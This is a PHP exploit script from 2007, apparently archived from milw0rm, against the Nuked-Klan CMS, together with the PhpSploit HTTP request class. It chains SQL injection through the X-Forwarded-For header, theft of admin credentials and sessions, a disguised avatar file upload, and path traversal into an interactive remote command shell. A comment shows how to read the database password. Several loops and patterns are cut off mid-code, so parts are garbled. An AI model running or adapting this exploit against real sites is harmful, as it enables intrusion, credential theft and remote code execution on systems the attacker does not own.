# Website: http://www.acid-root.new.fr/ # PHP conditions: None =] # Private since 2 months. # error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class. $xpl = new phpsploit(); $url = 'http://localhost/nk/'; # url $prx = ''; # proxy : $pra = ''; # basic authentification $xpl->agent("Firefox"); $xpl->allowredirection(0); $xpl->cookiejar(0); if($prx) $xpl->proxy($prx); if($pra) $xpl->proxyauth($pra); $config = array(); $config[] = 'nuked'; # table prefix $config[] = 'nuked'; # cookie prefix $config[] = 'ORDER by date LIMIT 1'; # sql conditions $config[] = 'HAK'; # match, length <= 3 $config[] = ''; $request = array(); $request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'"; $request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'"; $request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'"; $request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'"; for($i=0;$iaddheader("X-Forwarded-For",$sql); $xpl->get($url); $xpl->reset('header'); } if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches)) die("Exploit Failed"); $what = array("login","passwd","user_id","session"); for($i=0;$i ".$matches[2][$i]; if(empty($matches[2][3])) exit("\nNo session found"); # Logged in as admin $name = array("admin_session","user_id","sess_id"); $xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]); $phpc = array( frmdt_url => $url.'?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4])); $xpl->addheader('Referer',$url); $xpl->formdata($phpc); $xpl->get($url.'?file=User&op=edit_pref'); if(!preg_match('#\getcontent(),$match)) exit("\nNo file found"); else print "\n\$shell> "; $sql = array(); $sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/ $sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;"; $sql[] = "DELETE FROM $config[0]_nbconnecte;"; for($i=0;$ipost($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]); while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { # 0'); include('./conf.inc.php'); print $global['db_pass']; // $xpl->reset('header'); $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($url); $data = explode('123456789',$xpl->getcontent()); print $data[1]."\n\$shell> "; } function char($data) { $char='CHAR('; for($i=0;$iproxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport); else $socket = fsockopen($this->host,$this->port); if(!$socket) die("Error: The host doesn't exist"); if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n"; elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n"; else die("Error: Invalid method"); if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n"; $this->packet .= "Host: ".$this->host."\r\n"; if(!empty($this->agent)) $this->packet .= "User-Agent: ".$this->agent."\r\n"; if(!empty($this->header)) $this->packet .= $this->header."\r\n"; if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n"; $this->packet .= "Connection: Close\r\n"; if($this->method==="post") { $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data."\r\n"; } elseif($this->method==="formdata") { $this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data; } $this->packet .= "\r\n"; $this->recv = ''; fputs($socket,$this->packet); while(!feof($socket)) $this->recv .= fgets($socket); fclose($socket); if($this->cookiejar) $this->cookiejar($this->getheader($this->recv)); if($this->allowredirection) return $this->allowredirection($this->recv); else return $this->recv; } /** * This function allows you to add several cookie in the * request. Several methods are supported: * * $this->addcookie("name","value"); * or * $this->addcookie("name=newvalue"); * or * $this->addcookie("othername=overvalue; xx=zz; y=u"); * * @param string $cookiename * @param string $cookievalue * */ public function addcookie($cookn,$cookv='') { // $this->addcookie("name","value"); work avec replace if(!empty($cookv)) { if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete if(!empty($this->cookie)) { if(preg_match("/$cookn=/",$this->cookie)) { $this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie); } else { $this->cookie .= " ".$cookn."=".$cookv.";"; // " ". } } else { $this->cookie = $cookn."=".$cookv.";"; } } // $this->addcookie("name=value; othername=othervalue"); else { if(!empty($this->cookie)) { $cookn = preg_replace("/(.*);$/","$1",$cookn); $cookarr = explode(";",str_replace(" ", "",$cookn)); for($i=0;$iaddcookie($cookn,$cookv); } } else { $cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";"; $this->cookie = $cookn; } } } /** * This function allows you to add several headers in the * request. Several methods are supported: * * $this->addheader("headername","headervalue"); * or * $this->addheader("headername: headervalue"); * * @param string $headername * @param string $headervalue */ public function addheader($headern,$headervalue='') { // $this->addheader("name","value"); if(!empty($headervalue)) { if(!empty($this->header)) { if(preg_match("/$headern:/",$this->header)) { $this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header); } else { $this->header .= "\r\n".$headern.": ".$headervalue; } } else { $this->header=$headern.": ".$headervalue; } } // $this->addheader("name: value"); else { if(!empty($this->header)) { $headarr = explode(": ",$headern); $headern = $headarr[0]; $headerv = $headarr[1]; $this->addheader($headern,$headerv); } else { $this->header=$headern; } } } /** * This function allows you to use an http proxy server. * Several methods are supported: * * $this->proxy("proxyip","8118"); * or * $this->proxy("proxyip:8118") * * @param string $proxyhost * @param integer $proxyport */ public function proxy($proxy,$proxyp='') { // $this->proxy("localhost:8118"); if(empty($proxyp)) { preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr); $proxh = $proxarr[1]; $proxp = $proxarr[2]; $this->proxyhost=$proxh; $this->proxyport=$proxp; } // $this->proxy("localhost",8118); else { $this->proxyhost=$proxy; $this->proxyport=intval($proxyp); } if($this->proxyport > 65535) die("Error: Invalid port number"); } /** * This function allows you to use an http proxy server * which requires a basic authentification. Several * methods are supported: * * $this->proxyauth("darkfig","dapasswd"); * or * $this->proxyauth("darkfig:dapasswd"); * * @param string $proxyuser * @param string $proxypass */ public function proxyauth($proxyauth,$proxypasse='') { // $this->proxyauth("darkfig:password"); if(empty($proxypasse)) { preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr); $proxu = $proxautharr[1]; $proxp = $proxautharr[2]; $this->proxyuser=$proxu; $this->proxypass=$proxp; } // $this->proxyauth("darkfig","password"); else { $this->proxyuser=$proxyauth; $this->proxypass=$proxypasse; } } /** * This function allows you to set the "User-Agent" header. * Several methods are possible to do that: * * $this->agent("Mozilla Firefox"); * or * $this->addheader("User-Agent: Mozilla Firefox"); * or * $this->addheader("User-Agent","Mozilla Firefox"); * * @param string $useragent */ public function agent($useragent) { $this->agent=$useragent; } /** * This function returns the header which will be * in the next request. * * $this->showheader(); * * @return $header */ public function showheader() { return $this->header; } /** * This function returns the cookie which will be * in the next request. * * $this->showcookie(); * * @return $storedcookies */ public function showcookie() { return $this->cookie; } /** * This function returns the last formed * http request (the http packet). * * $this->showlastrequest(); * * @return $last_http_request */ public function showlastrequest() { return $this->packet; } /** * This function sends the formed http packet with the * GET method. You can precise the port of the host. * * $this->get("http://localhost"); * $this->get("http://localhost:888/xd/tst.php"); * * @param string $urlwithpath * @return $server_response */ public function get($url) { $this->target($url); $this->method="get"; return $this->sock(); } /** * This function sends the formed http packet with the * POST method. You can precise the port of the host. * * $this->post("http://localhost/index.php","admin=1&user=dark"); * * @param string $urlwithpath * @param string $postdata * @return $server_response */ public function post($url,$data) { $this->target($url); $this->method="post"; $this->data=$data; return $this->sock(); } /** * This function sends the formed http packet with the * POST method using the multipart/form-data enctype. * * $array = array( * frmdt_url => "http://localhost/upload.php", * frmdt_boundary => "123456", # Optional * "email" => "me@u.com", * "varname" => array( * frmdt_type => "image/gif", # Optional * frmdt_transfert => "binary", # Optional * frmdt_filename => "hello.php", * frmdt_content => "")); * $this->formdata($array); * * @param array $array * @return $server_response */ public function formdata($array) { $this->target($array[frmdt_url]); $this->method="formdata"; $this->data=''; if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit"; else $this->boundary=$array[frmdt_boundary]; foreach($array as $key => $value) { if(!preg_match("#^frmdt_(boundary|url)#",$key)) { $this->data .= "-----------------------------".$this->boundary."\r\n"; $this->data .= "Content-Disposition: form-data; name=\"".$key."\";"; if(!is_array($value)) { $this->data .= "\r\n\r\n".$value."\r\n"; } else { $this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n"; if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n"; if(isset($array[$key][frmdt_transfert])) $this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n"; $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; } } } $this->data .= "-----------------------------".$this->boundary."--\r\n"; return $this->sock(); } /** * This function returns the content of the server response * without the headers. * * $this->getcontent($this->get("http://localhost/")); * or * $this->getcontent(); * * @param string $server_response * @return $onlythecontent */ public function getcontent($code='') { if(empty($code)) $code = $this->recv; $content = explode("\n",$code); $onlycode = ''; for($i=1;$igetheader($this->post("http://localhost/x.php","x=1&z=2")); * or * $this->getheader(); * * @param string $server_response * @return $onlytheheaders */ public function getheader($code='') { if(empty($code)) $code = $this->recv; $header = explode("\n",$code); $onlyheader = $header[0]."\n"; for($i=1;$iaddcookie($cookn,$cookv); } } /** * This function is called by the get()/post() functions. * You don't have to call it. * * @param string $urltarg */ private function target($urltarg) { if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/"; $this->url=$urltarg; $array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg))); $this->host=$array[0]; preg_match("/:(\d+)\//",$urltarg,$matches); $this->port=empty($matches[1]) ? 80 : $matches[1]; $temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)); preg_match("/\/(.*)\//",$temp,$matches); $this->path=str_replace("//","/","/".$matches[1]."/"); if($this->port > 65535) die("Error: Invalid port number"); } /** * If you call this function, the script will * extract all "Set-Cookie" headers values * and it will automatically add them into the "Cookie" header * for all next requests. * * $this->cookiejar(1); // enabled * $this->cookiejar(0); // disabled * */ public function cookiejar($code) { if($code===0) $this->cookiejar=''; if($code===1) $this->cookiejar=1; else { $this->getcookie($code); } } /** * If you call this function, the script will * follow all redirections sent by the server. * * $this->allowredirection(1); // enabled * $this->allowredirection(0); // disabled * * @return $this->get($locationresponse) */ public function allowredirection($code) { if($code===0) $this->allowredirection=''; if($code===1) $this->allowredirection=1; else { if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr)) { $location = str_replace(chr(13),'',$codearr[2]); if(!eregi("://",$location)) { return $this->get("http://".$this->host.$this->path.$location); } else { return $this->get($location); } } else { return $code; } } } /** * This function allows you to reset some parameters: * * $this->reset(header); // headers cleaned * $this->reset(cookie); // cookies cleaned * $this->reset(); // clean all parameters * * @param string $func */ public function reset($func='') { switch($func) { case "header": $this->header=''; break; case "cookie": $this->cookie=''; break; default: $this->cookiejar=''; $this->header=''; $this->cookie=''; $this->allowredirection=''; $this->agent=''; break; } } } ?> # milw0rm.com [2007-05-05]